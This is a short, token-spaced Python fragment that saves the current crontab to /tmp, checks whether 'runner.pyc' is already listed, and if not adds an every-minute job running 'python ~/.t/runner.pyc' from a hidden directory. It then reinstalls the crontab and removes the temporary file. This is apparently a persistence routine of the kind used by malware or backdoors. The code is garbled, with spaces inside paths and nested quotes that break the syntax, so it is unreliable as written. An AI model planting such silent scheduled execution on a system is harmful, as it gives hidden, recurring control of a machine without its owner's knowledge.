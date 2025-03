""" add to crontab """

#save the current crontab file

subprocess . call ( " crontab -l > / tmp/ dump " , shell = True )

#seek file if runner is in it

infile = open ( " / tmp/ dump " , " r " )

if not " runner. pyc " in infile . read () :

#add the script to crontab

subprocess . call ( " echo " * * * * * python ~/ . t / runner . pyc " > >/ tmp/ dump " , shell = True )

#import the new crontab

subprocess . call ( " crontab / tmp/ dump " , shell = True )

subprocess . call ( " rm -f / tmp/ dump " , shell = True )